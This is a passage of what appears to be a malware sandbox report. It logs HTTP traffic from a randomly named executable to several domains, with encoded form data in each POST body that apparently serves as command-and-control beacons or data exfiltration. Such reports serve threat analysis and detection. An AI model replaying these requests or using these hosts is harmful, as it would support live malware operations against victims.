                                                                                                        Data Ascii: aNXP_jw=onR9AvgxrVBHVVyBvwJJSd9Kdqo7dfDB7Lfc//jmMiGIzptL9bRa8FIEkABpgF/z9nkLKmMokN6lxfl9D6w9KaoYx0MgAjN2ZGppCgsQza1mrWTqNFqpbqzQyf6LvjXV/XUKm1HGnjQw+1j7/DcLgcJ0axql+q6bkRap/OeOklxdseg9BO+EgbA9QfY9y0TOQBzzE/z5kL7bYc3b2HZQrQT7hlb+Nk/154BGyEAhLT94WimDpxo2s9tqizaYdRbN9DypJDzlmYeiAYsPz+e/VxkO6c98nQT7cdAVnIIPs7wXbBFgEEwdfAncztTOIqIs6ppnvDR+yYjtm+Y/DRYlZa0eF4R59J0dPPyanKpeC+wKaHl4G7xBzxVJmYSpIhfjwSnjT7GS11PZP4C2SnJ/8V5mN3yMXsUnH2Jmc0bXQwXo1eOwL8valEwv/1vUchMpRvOgpNPkE61986P5Rb8k+tgHrkZTXriR31PgDFQLaE8tYeADJMn78bDdY91amiwossOf4lG+SNchqszG17tErArDHfLemQn4GSfvu/+9vg6uW6ry//vJ5ANcEq1k/96FHB22OnHZGkzUQXKlQ9fiesOHoHRKXry0UsVVvAaiGvHYLFf9nvbE93rdO2BH3jF9fYLBZBqfI6ReJk25EuxmjYVHXmrkzJy0ZjW9gS5Qns75L+FU4zBleFQsZMMGWrCsOlcg4GIgC0rUboU3kszdTRMSFl/KahgJhVmLLD06ZWm/Jm4qOSqKmuhtSN9a4KSGLIvEJcZLV7IFcUBNSLOq90wYBQY4pSUTSDQhht8H1knEp0e3TXfuQNn3MHX0AtXiIaWNj9/zocQ7i5FuTrMp2b/UhdVFoMD704mgKzgLX8Z78g6lTqPTHRcUH09wDi+xeROxkwmUydGCUoM2i4Oa8hnzJK91/aFioz4V/OZaYCh1EQVy5tuAkEJo2bQPU4Yfv/Vq8t0w7MoPhuTFBx/NHXssLGsEje65HZ5QyPrK2TFy [TRUNCATED]
                                                                                                        Dec 2, 2024 14:38:40.199031115 CET533INHTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:38:39 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.649968209.74.64.187802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:41.615027905 CET549OUTGET /ohf8/?aNXP_jw=ll5dDbshsmxjCV2KoC1RTtNOe9IddMOnmIejqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqC7Yr6zshBBR6fmx5Fk8+3pxn0VniOhKvc7yUqYSWiUeq1UgZ2CQ=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.jagdud.store
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:38:42.952363014 CET548INHTTP/1.1 404 Not Found
                                                                                                        Date: Mon, 02 Dec 2024 13:38:42 GMT
                                                                                                        Server: Apache
                                                                                                        Content-Length: 389
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.6499853.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:48.700900078 CET816OUTPOST /gofy/ HTTP/1.1
                                                                                                        Host: www.wiretap.digital
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.wiretap.digital
                                                                                                        Referer: http://www.wiretap.digital/gofy/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 33 52 67 51 6e 75 30 71 31 57 39 50 69 57 50 51 5a 57 50 61 4c 51 57 2b 6f 6f 59 6a 6b 48 47 4e 72 68 79 50 71 30 46 72 50 7a 4f 76 79 62 59 5a 66 41 6e 45 31 55 64 73 30 54 6e 46 62 55 38 51 30 70 33 54 63 53 73 34 5a 4c 79 6f 6a 30 67 6e 66 69 36 34 65 6e 6d 52 75 34 2b 37 38 49 48 65 62 77 2b 53 7a 42 34 68 43 45 42 6c 78 39 49 51 76 50 4e 53 4a 65 53 30 54 43 6b 45 48 47 37 31 4f 6e 6f 35 2f 73 65 63 4e 35 47 39 6e 65 34 56 4f 6e 53 59 62 34 43 49 6b 2f 6a 69 34 68 4b 30 41 66 4a 63 49 71 75 37 50 4c 77 34 4f 34 68 73 63 67 4f 62 6f 6b 36 71 32 42 6a 33 65 4d 39 4a 34 61 69 50 38 39 34 70 35 79 67 69
                                                                                                        Data Ascii: aNXP_jw=3RgQnu0q1W9PiWPQZWPaLQW+ooYjkHGNrhyPq0FrPzOvybYZfAnE1Uds0TnFbU8Q0p3TcSs4ZLyoj0gnfi64enmRu4+78IHebw+SzB4hCEBlx9IQvPNSJeS0TCkEHG71Ono5/secN5G9ne4VOnSYb4CIk/ji4hK0AfJcIqu7PLw4O4hscgObok6q2Bj3eM9J4aiP894p5ygi


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.6499923.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:51.373893023 CET840OUTPOST /gofy/ HTTP/1.1
                                                                                                        Host: www.wiretap.digital
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.wiretap.digital
                                                                                                        Referer: http://www.wiretap.digital/gofy/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 33 52 67 51 6e 75 30 71 31 57 39 50 68 33 2f 51 65 46 6e 61 4e 77 57 78 6e 49 59 6a 76 6e 47 42 72 68 4f 50 71 78 67 75 50 41 71 76 79 37 6f 5a 65 42 6e 45 6d 6b 64 73 38 7a 6e 41 46 6b 39 65 30 70 37 68 63 51 34 34 5a 4c 4f 6f 6a 32 6f 6e 65 56 75 6e 66 33 6d 54 6a 59 2b 35 6b 6f 48 65 62 77 2b 53 7a 42 38 48 43 41 56 6c 79 4a 30 51 67 4f 4e 52 44 2b 53 37 53 43 6b 45 4e 6d 37 70 4f 6e 6f 4c 2f 74 44 37 4e 2f 43 39 6e 62 38 56 4f 32 53 62 4f 49 43 47 35 50 69 75 32 7a 72 4d 4e 63 51 4c 55 72 32 38 50 4d 49 50 50 4f 38 32 41 54 4f 34 36 30 61 6f 32 44 37 46 65 73 39 6a 36 61 61 50 75 71 30 4f 32 47 46 42 52 31 75 31 79 45 64 73 63 67 78 63 69 49 46 36 76 78 4a 66 37 41 3d 3d
                                                                                                        Data Ascii: aNXP_jw=3RgQnu0q1W9Ph3/QeFnaNwWxnIYjvnGBrhOPqxguPAqvy7oZeBnEmkds8znAFk9e0p7hcQ44ZLOoj2oneVunf3mTjY+5koHebw+SzB8HCAVlyJ0QgONRD+S7SCkENm7pOnoL/tD7N/C9nb8VO2SbOICG5Piu2zrMNcQLUr28PMIPPO82ATO460ao2D7Fes9j6aaPuq0O2GFBR1u1yEdscgxciIF6vxJf7A==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.6499993.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:54.039807081 CET1853OUTPOST /gofy/ HTTP/1.1
                                                                                                        Host: www.wiretap.digital
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.wiretap.digital
                                                                                                        Referer: http://www.wiretap.digital/gofy/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 33 52 67 51 6e 75 30 71 31 57 39 50 68 33 2f 51 65 46 6e 61 4e 77 57 78 6e 49 59 6a 76 6e 47 42 72 68 4f 50 71 78 67 75 50 41 69 76 79 4b 49 5a 66 6d 4c 45 33 55 64 73 79 54 6e 42 46 6b 39 54 30 70 79 6f 63 51 31 50 5a 4f 4b 6f 69 54 6b 6e 50 55 75 6e 57 33 6d 54 38 49 2b 36 38 49 47 55 62 77 75 57 7a 42 73 48 43 41 56 6c 79 50 51 51 70 2f 4e 52 46 2b 53 30 54 43 6b 59 48 47 37 56 4f 6e 51 62 2f 74 48 42 4e 4d 4b 39 6e 37 4d 56 4e 45 4b 62 53 59 43 54 36 50 6a 7a 32 7a 6e 54 4e 66 30 48 55 72 53 57 50 4c 34 50 50 34 4a 35 51 6e 62 6e 6e 48 36 63 6f 67 4c 7a 5a 4b 70 4a 67 73 65 55 72 36 6b 79 37 32 64 66 64 41 66 32 78 31 77 76 61 54 6f 30 6b 76 59 4c 72 41 4d 4d 74 4a 63 32 56 44 58 38 71 6e 58 65 6e 4c 6d 64 4d 6f 35 33 6c 33 7a 56 72 61 44 4f 57 47 2b 58 36 6f 47 47 4f 53 39 71 33 32 34 67 73 35 71 64 32 2b 45 49 73 77 6d 38 4f 2f 66 79 69 44 47 48 74 37 6c 5a 34 5a 35 69 39 72 56 61 43 62 59 69 33 46 4a 36 4f 61 61 65 46 62 2b 42 66 5a 76 6a 4b 43 65 50 65 76 54 30 61 38 [TRUNCATED]
                                                                                                        Data Ascii: aNXP_jw=3RgQnu0q1W9Ph3/QeFnaNwWxnIYjvnGBrhOPqxguPAivyKIZfmLE3UdsyTnBFk9T0pyocQ1PZOKoiTknPUunW3mT8I+68IGUbwuWzBsHCAVlyPQQp/NRF+S0TCkYHG7VOnQb/tHBNMK9n7MVNEKbSYCT6Pjz2znTNf0HUrSWPL4PP4J5QnbnnH6cogLzZKpJgseUr6ky72dfdAf2x1wvaTo0kvYLrAMMtJc2VDX8qnXenLmdMo53l3zVraDOWG+X6oGGOS9q324gs5qd2+EIswm8O/fyiDGHt7lZ4Z5i9rVaCbYi3FJ6OaaeFb+BfZvjKCePevT0a8xUwd9F5xVeLeki+Lr9YN8Ga7vyaPOCXeevBr/A3eKCaV4QSqsVlLPkJ09cwTci68N5sq0DDG5q21KqdRS5bQRXxlcT2r5tWsrWXb6dQLqoeFZpuVitkoIgzTwKq5+dJ7ccjUP8lqpqBYfftIcPk6A9jftC50a2jEMwgmbRi0M2/Lo3/jALDQmRFDTcT4zKZnt8wYsEMlolGBGijBbVoQ2niL0aqqzbL9Gev+hgXH6K9UBS0+zBc5ewR/dm2d1ArpU4SwLTZV8SWjNSSSV7GKalP7nmuNt0GtiHhqYG6j/0hSVukaNB3lBBvGsdlRjXMr1aa8CeqNIQ+NQvt7yARbSuB2oL350mDGAH8rH7F31cm6Kr6GwaUGcjxH85l+7ynYRmU845N4i6jbC2DD8GE7f14afUYj1IK6RiwGjZ8zQZeCaA5RLGEaOUHQQKcq+vSNWWoCBDNk3Cj4n9Kd9Os10cyuC+9OOOHfRrgRkMhrCcs8Xf4h6bkBzo16RDLDhRodC9azgJcpH8Zx/2fXzN+AmEdevh4tEBHlB1APk4gviVL2vlfccjYmolmYoj3q4LeGOy1FXOguQsZ+7K8T0iw+Lexmz6cWTtOhkUdHqQNDxJQjwfIk7T2HPAFx7CRecdoDkzzfv1sW9xOoCGT9kHNx5JFmIkg0Mblrjq [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.6500053.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:38:56.692955017 CET552OUTGET /gofy/?cTT8u=Q4NHoHJ0&aNXP_jw=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iVQqerNi8ibzmajOWyGUvPjo8vNYMiNR/EtvLRStZKR6xKR5Vua8= HTTP/1.1
                                                                                                        Host: www.wiretap.digital
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Dec 2, 2024 14:38:57.778453112 CET414INHTTP/1.1 200 OK
                                                                                                        Server: openresty
                                                                                                        Date: Mon, 02 Dec 2024 13:38:57 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 274
                                                                                                        Connection: close
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 63 54 54 38 75 3d 51 34 4e 48 6f 48 4a 30 26 61 4e 58 50 5f 6a 77 3d 36 54 49 77 6b 61 4d 4b 38 32 4a 55 32 6c 54 34 50 32 62 67 4a 69 50 41 76 49 63 36 6a 58 71 64 2b 6a 37 75 2b 33 68 4a 47 6a 6e 47 70 66 51 69 58 51 50 77 6c 78 31 53 79 6c 76 6b 47 7a 52 55 6a 4e 2f 58 56 79 46 5a 64 64 33 5a 72 47 74 30 52 79 36 69 56 51 71 65 72 4e 69 38 69 62 7a 6d 61 6a 4f 57 79 47 55 76 50 6a 6f 38 76 4e 59 4d 69 4e 52 2f 45 74 76 4c 52 53 74 5a 4b 52 36 78 4b 52 35 56 75 61 38 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?cTT8u=Q4NHoHJ0&aNXP_jw=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iVQqerNi8ibzmajOWyGUvPjo8vNYMiNR/EtvLRStZKR6xKR5Vua8="}</script></head></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.6500113.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:03.596259117 CET801OUTPOST /5l50/ HTTP/1.1
                                                                                                        Host: www.it2sp8.vip
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.it2sp8.vip
                                                                                                        Referer: http://www.it2sp8.vip/5l50/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 6d 4d 45 30 5a 58 30 63 5a 47 74 75 6c 41 74 38 79 43 2f 64 58 55 4c 64 47 38 36 2f 57 6c 4c 33 73 2b 73 57 34 59 78 66 53 7a 72 58 56 43 4e 4c 63 4d 52 72 52 6b 5a 7a 76 78 62 54 56 42 70 79 34 31 44 2b 74 66 74 6f 39 6e 64 63 4d 74 74 78 57 32 7a 6b 66 77 41 67 67 75 53 44 44 38 2b 6d 63 56 59 71 39 32 4c 73 66 6d 45 36 61 47 59 53 34 4f 4a 4e 6d 6c 37 61 58 72 41 79 4b 65 65 63 74 67 39 49 66 57 2b 59 58 38 6b 49 59 72 4a 53 48 57 4b 4c 34 44 56 35 74 41 5a 65 61 38 78 62 79 34 42 69 2f 4c 34 55 71 64 30 4d 48 2b 54 2f 51 74 33 41 31 47 2f 2f 51 76 4e 38 74 79 34 37 4a 2b 6a 53 41 6d 37 62 51 70 6f 36
                                                                                                        Data Ascii: aNXP_jw=mME0ZX0cZGtulAt8yC/dXULdG86/WlL3s+sW4YxfSzrXVCNLcMRrRkZzvxbTVBpy41D+tfto9ndcMttxW2zkfwAgguSDD8+mcVYq92LsfmE6aGYS4OJNml7aXrAyKeectg9IfW+YX8kIYrJSHWKL4DV5tAZea8xby4Bi/L4Uqd0MH+T/Qt3A1G//QvN8ty47J+jSAm7bQpo6


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.6500123.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:06.280425072 CET825OUTPOST /5l50/ HTTP/1.1
                                                                                                        Host: www.it2sp8.vip
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.it2sp8.vip
                                                                                                        Referer: http://www.it2sp8.vip/5l50/
                                                                                                        Content-Length: 236
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 6d 4d 45 30 5a 58 30 63 5a 47 74 75 6b 67 64 38 78 68 58 64 51 30 4c 61 59 4d 36 2f 50 31 4b 38 73 2b 67 57 34 5a 6b 45 53 42 50 58 56 6a 64 4c 66 49 46 72 53 6b 5a 7a 67 52 62 57 49 78 6f 66 34 31 2b 44 74 65 52 6f 39 6e 4a 63 4d 70 70 78 4b 52 6e 6a 5a 67 41 75 31 2b 53 42 4d 63 2b 6d 63 56 59 71 39 79 72 43 66 69 51 36 61 79 6b 53 35 76 4a 4f 73 46 37 56 65 4c 41 79 62 75 65 59 74 67 39 71 66 55 4b 79 58 2f 51 49 59 70 52 53 48 48 4b 49 7a 44 56 2f 67 67 59 43 62 74 59 7a 37 72 74 68 33 61 4d 65 2b 39 45 4a 43 49 4f 6c 4d 65 33 6a 6e 57 66 39 51 74 56 4f 74 53 34 52 4c 2b 62 53 53 78 33 38 66 64 4e 5a 5a 65 72 37 63 72 55 65 46 56 52 64 6b 49 56 45 33 54 6c 6c 45 77 3d 3d
                                                                                                        Data Ascii: aNXP_jw=mME0ZX0cZGtukgd8xhXdQ0LaYM6/P1K8s+gW4ZkESBPXVjdLfIFrSkZzgRbWIxof41+DteRo9nJcMppxKRnjZgAu1+SBMc+mcVYq9yrCfiQ6aykS5vJOsF7VeLAybueYtg9qfUKyX/QIYpRSHHKIzDV/ggYCbtYz7rth3aMe+9EJCIOlMe3jnWf9QtVOtS4RL+bSSx38fdNZZer7crUeFVRdkIVE3TllEw==


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.6500133.33.130.190802488C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Dec 2, 2024 14:39:08.950103045 CET1838OUTPOST /5l50/ HTTP/1.1
                                                                                                        Host: www.it2sp8.vip
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.it2sp8.vip
                                                                                                        Referer: http://www.it2sp8.vip/5l50/
                                                                                                        Content-Length: 1248
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                        Data Raw: 61 4e 58 50 5f 6a 77 3d 6d 4d 45 30 5a 58 30 63 5a 47 74 75 6b 67 64 38 78 68 58 64 51 30 4c 61 59 4d 36 2f 50 31 4b 38 73 2b 67 57 34 5a 6b 45 53 42 48 58 56 7a 42 4c 64 70 46 72 63 45 5a 7a 70 78 62 58 49 78 6f 6e 34 31 57 48 74 65 64 34 39 6b 78 63 65 61 68 78 47 30 62 6a 58 67 41 75 33 2b 53 43 44 38 2f 73 63 56 70 74 39 32 48 43 66 69 51 36 61 7a 30 53 77 65 4a 4f 71 46 37 61 58 72 41 32 4b 65 66 2f 74 67 45 49 66 55 66 48 58 73 49 49 62 4a 42 53 47 31 69 49 73 7a 56 39 6c 67 59 4b 62 74 45 73 37 72 77 51 33 61 34 6e 2b 36 6b 4a 41 4d 50 46 4a 76 4c 75 38 33 4c 71 4c 36 78 46 71 6b 45 44 50 6f 6a 34 61 52 48 34 51 73 68 71 41 75 76 44 49 39 41 53 4e 45 5a 31 71 64 55 4a 38 52 34 43 58 76 35 38 4f 46 58 4c 4d 48 6c 43 64 36 6c 41 4e 6f 6a 42 4f 49 69 6c 6a 32 56 6b 2f 69 71 4a 49 49 7a 4b 58 4c 4f 68 78 2f 37 6e 48 48 73 7a 4d 56 30 71 55 43 50 35 73 41 37 76 64 38 30 2f 52 79 43 33 70 52 48 7a 2f 67 5a 34 56 4c 76 45 4a 72 48 35 68 36 6a 6c 70 56 6d 51 50 35 67 54 70 43 41 73 35 6d 4f 6f 75 75 [TRUNCATED]
